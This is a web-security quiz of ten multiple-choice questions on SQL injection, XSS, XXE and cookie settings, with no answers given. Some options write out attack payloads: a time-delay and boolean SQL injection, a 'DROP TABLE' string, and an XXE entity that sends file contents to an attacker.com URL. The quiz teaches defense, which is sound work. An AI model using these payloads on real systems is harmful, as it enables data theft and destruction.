Cyber Quiz Day 31

Question 1

You have a login form that returns the same generic “Invalid credentials” message for wrong usernames and wrong passwords. Which of the following is the most reliable way to confirm a blind SQL injection vulnerability exists without triggering noisy errors?

  • Submit username' OR '1'='1-- and check for a different error page.

  • Inject a time-based payload (e.g., '; WAITFOR DELAY '0:0:10'--) and measure response time.

  • Add UNION SELECT payloads and look for SQL errors in the response.

  • Try a large input string to cause a buffer overflow and observe crash logs.

Question 2

Which of the following is the weakest mitigation strategy against SQL injection, despite being commonly recommended?

  • Using prepared statements / parameterized queries.

  • Using ORM methods that bind parameters.

  • Applying a strict allowlist (whitelist) for expected input values.

  • Escaping input based on the DB engine’s escaping rules.

Question 3

A comment field stores attacker-supplied HTML that later executes in other users’ browsers when they view the page. The malicious script is persisted in the application database. What type of XSS is this?
  • Reflected XSS

  • DOM-based XSS

  • Stored (persistent) XSS

  • Mutated XSS

Question 4

You must prevent XSS in an app that returns user comments inside an HTML context but also supports basic Markdown (bold, links). Which approach is the safest while preserving formatting?

  • Sanitize HTML with a permissive whitelist (allow <b>, <a>) using a vetted HTML sanitizer library.

  • Strip all HTML tags and render raw Markdown as HTML.

  • Escape all user input and then run a Markdown-to-HTML converter.

  • Rely on CSP to block inline scripts and do nothing server-side.

Question 5

Which XXE payload technique is specifically used to exfiltrate data out-of-band (OOB) to an attacker-controlled server?

  • Billion Laughs entity expansion to crash the parser.

  • Supplying <!DOCTYPE to trigger in-memory XML errors.

  • External entity referencing an HTTP URL: <!ENTITY xxe SYSTEM "http://attacker.com/steal?data=%file;">

  • Using CDATA sections to hide payloads.

Question 6

You maintain a Java web service using DocumentBuilderFactory to parse XML. Which single configuration call most directly mitigates XXE by disabling external entity resolution?

  • factory.setNamespaceAware(true)

  • factory.setExpandEntityReferences(true)

  • factory.setIgnoringElementContentWhitespace(true)

  • factory.setFeature("http://xml.org/sax/features/external-general-entities", false)

Question 7

Which boolean-based SQL injection payload can help you extract a single character of a string when only yes/no responses are observable?

  • AND 1=1

  • AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1) = 'a'

  • UNION SELECT password FROM users

  • ; DROP TABLE users; --

Question 8

A web application stores the session token in a cookie and has implemented HttpOnly. Which cookie attribute must you additionally set to reduce risk of session theft via cross-site requests (CSRF) and mitigate some XSS-related attacks?

  • Secure only

  • Path=/ only

  • Domain=.example.com

  • SameSite (preferably Strict or Lax)

Question 9

An application reflects a user-controlled value into the page, but only into a JavaScript location.hash fragment which then gets used by client-side code to construct HTML via document.write(location.hash). What is the most accurate classification and why is it dangerous?

  • DOM-based XSS - dangerous because client-side code writes untrusted data into the DOM.

  • Reflected XSS - safe because hash is not sent to server.

  • Stored XSS - dangerous because value persists on the server.

  • CSP bypass - not XSS at all.

Question 10

You must prevent XXE and also keep legitimate XML features for trusted feeds. What is the most practical design pattern to follow?

  • Disable external entities globally and accept that some feeds won’t work.

  • Allow external entities for all inputs; rely on perimeter WAF to block attacks.

  • Parse untrusted XML with a secure XML parser configuration (disable external entities) and handle trusted feeds with a separate, explicitly-whitelisted parser configuration.

  • Convert all XML to JSON first and then parse JSON.
